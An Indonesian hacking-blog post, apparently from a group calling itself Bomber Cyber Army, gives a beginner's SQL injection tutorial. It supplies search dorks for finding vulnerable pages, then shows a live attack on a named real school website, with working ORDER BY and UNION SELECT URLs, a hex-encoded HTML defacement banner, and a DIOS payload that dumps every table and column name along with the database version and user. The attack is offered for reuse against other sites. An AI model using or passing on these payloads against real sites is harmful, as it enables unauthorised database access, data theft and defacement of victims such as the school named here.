input license here

Report Abuse

Search This Blog

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…

Sql Injection Buat Pemula


 Assalamualaikum Wr.Wb


Dikesempatan kali ini saya memberi cara SQL INJECTION Print Nama dan Gambar. Apa Itu SQL INJECTION ? SQL INJECTION adalah teknik injeksi kode , digunakan untuk menyerang aplikasi berbasis data, di mana pernyataan SQL berbahaya dimasukkan ke dalam bidang entri untuk dieksekusi (misalnya untuk membuang konten database ke penyerang). SQL INJECTION harus memanfaatkan kerentanan keamanan dalam perangkat lunak aplikasi, misalnya, saat masukan pengguna salah disaring untuk karakter pelolosan literal string yang disematkan dalam pernyataan SQL atau masukan pengguna tidak diketik dengan kuat dan dieksekusi secara tidak terduga. SQL INJECTION sebagian besar dikenal sebagai vektor serangan untuk situs web tetapi dapat digunakan untuk menyerang semua jenis database SQL. Serangan SQL INJECTION memungkinkan penyerang untuk memalsukan identitas, merusak data yang ada, menyebabkan masalah penolakan seperti membatalkan transaksi atau mengubah saldo, memungkinkan pengungkapan lengkap semua data di sistem, menghancurkan data atau membuatnya tidak tersedia, dan menjadi administrator dari server database. Mungkin cukup segitu. Jika ingin mengenal lebih dalam apa itu SQL INJECTION kalian bisa kunjungi Penjelasan Tentang Sql Injection


DORK :


inurl:/gallery.php?id=

inurl:/news.php?id=


Kembangin lagi sesuai otak:V



Oke lanjut, karena di sini saya sudah mempunyai target jadi langsung aja.


Target : http://www.lifecommunityschool.sch.id/gallery.php?k=9

1.Cek Vuln Website

Kita dapat cek vuln target dengan di beri tanda petik (') , Nah bagaimana kita mengetahui web tersebut vuln terhadap SQL INJECTION ? Jika kita beri tanda petik (') web tersebut berubah, seperti : blank putih( kosong ), gambar/tulisan hilang,tampilan beda dari sebelumnya, dan lain-lain.

Sekarang kita cek : http://www.lifecommunityschool.sch.id/gallery.php?k=9'

Dan ternyata vuln, web tersebut berubah/berbeda dari sebelumnya, Ok lanjut ke langkah kedua



2.Mencari Jumlah Tabel ( order by )


Oke di tahap ini kita akan memberikan perintah "order by", Oke langsung saja kita melakukan order by



http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 1-- - ( Kembali Normal )


http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 2-- - ( Normal )


http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 3-- - ( Normal )


http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 4-- - ( Normal )


http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 5-- - ( Berubah Bentuk/error )



Nah berarti Jumlah tabel atau column nya hanya 4



3.Mencari Angka Emas ( union select )


Sebelumnya, kita sudah mengetahui jumlah tabel/column nya, selanjutnya kita melakukan tahap mencari angka emas nya,bagaimana cara nya ? kita ganti kata "order by" menjadi "union select" dan menambahkan jumlah tabel/columns di atas dari "1" sampai "jumlah tabel" dan jangan lupa menambahkan tanda "-" di awal parameter, Oke langsung saja ( Jika kurang paham bisa komentar di bawah )


http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,3,4-- -


Dan kita lihat angka emas nya muncul yaitu di angka 3 dan 4.



4.Print Nama&Gambar beserta dump database ( Menggunakan Dios )


Dan akhirnya, yang di tunggu-tunggu telah tiba, yaitu Print nama&gambar beserta dump database ( Menggunakan Dios )


Pertama, kalian ubah dulu teks kalian menjadi hex 

Caranya di lakukan di web ini https://www.convertstring.com/id/EncodeDecode/HexEncode

Bebas kalian tulis apa aja setelah selesai pencet "Hex Encode!"

Oke, saya menulis"INJECT BY GILANG × FAMELLYA" dan di hex menjadi "494E4A4543542042592047494C414E4720D72046414D454C4C5941" Oke kita coba dulu print nama, tapi jangan lupa menambahkan "0x" di awalan hex, menjadi "0x494E4A4543542042592047494C414E4720D72046414D454C4C5941" Langsung saja kita print nama, cara nya ? kita ganti nomor emas menjadi hex, saya mengganti angka tiga menjadi hex, hasilnya : http://www.lifecommunityschool.sch.id/gallery.php?k=-9%27union%20select%201,2,concat+(0x494E4A4543542042592047494C414E4720D72046414D454C4C5941),4-- -

Oke lanjut ke print gambar nya, caranya ? kita tambahkan <img src="link.com/gambar.jpg"> 


contoh : <img src=" https://i.top4top.io/p_1888v0uv70.jpg "> dan kita dapat mengatur ukuran panjang dan lebar nya dengan cara menambah "width dan height" ( tag html )


contoh : <img src=" https://i.top4top.io/p_1888v0uv70.jpg " width="200" heigth="200"> kita gabungkan dengan "INJECT BY GILANG × FAMELLYA" bisa kalian ubah menjadi keren dengan menggunakan "tag html", Oke langsung aja ke intinya, disini saya sudah membuat print gambar dan nama + tag html ( Biar keren:V )


tulisan saya :


<center> <img src=" https://i.top4top.io/p_1888v0uv70.jpg " width="200" heigth="200"><br><font size="5" color="lime">INJECT BY<br>GILANG × FAMELLYA</font><center>


Dan jangan lupa untuk di hex dan menjadi


" (0× 3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E)"


Kita ganti angka 3 menjadi bilangan hex diatas menjadi 


http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,Concat+(0x3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E),4-- -


Selanjutnya kita print nama&gambar beserta dump database, cara nya ? kita gabungkan dios dan hex di atas menjadi satu


Dios : (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ',' %C2%A0:: %C2%A0','<font color=blue size=3>',column_name))),@)))


Dan menjadi

http://www.lifecommunityschool.sch.id/gallery.php?k=-9%27union%20select%201,2,Concat+(0x3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E,(select(select%20concat(@:=0xa7,(select%20count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,%27<br>%27,%27<font%20color=green%20size=3>%27,table_name,%27</font>%20%27,%27%20 ::%20 %27,%27<font%20color=blue%20size=3>%27,column_name))),@)))),4-- -


Note *  Jika Kalian Ingin Menambahkan Versi,database,versi


'<br>','<font color=%22orange%22>','Versi :: ','</font>',version(),'<br>','<font color=%22orange%22>','User :: ','</font>',user(),'<br>','<font color=%22orange%22>','Database :: ','</font>',database(),'<br>',


bisa kalian tambahkan sesudah bilangan hex


Hasilnya 


http://www.lifecommunityschool.sch.id/gallery.php?k=-9%27union%20select%201,2,Concat+(0x3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E,'<br>','<font color=%22orange%22>','Versi :: ','</font>',version(),'<br>','<font color=%22orange%22>','User :: ','</font>',user(),'<br>','<font color=%22orange%22>','Database :: ','</font>',database(),'<br>',(select(select%20concat(@:=0xa7,(select%20count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,%27<br>%27,%27<font%20color=green%20size=3>%27,table_name,%27</font>%20%27,%27%20 ::%20 %27,%27<font%20color=blue%20size=3>%27,column_name))),@)))),4-- -


Jika kalian ingin mengganti/menambahkan seperti user(), version(), database(), @@port


lebih lengkap nya bisa kalian cek di bawah

https://pastebin.com/zczdYgDj


Oke sekian dari saya terima kasih dan semoga bermanfaat 

BomberCyberArmy
Gw F4K3_5M1LE

Related Posts

Post a Comment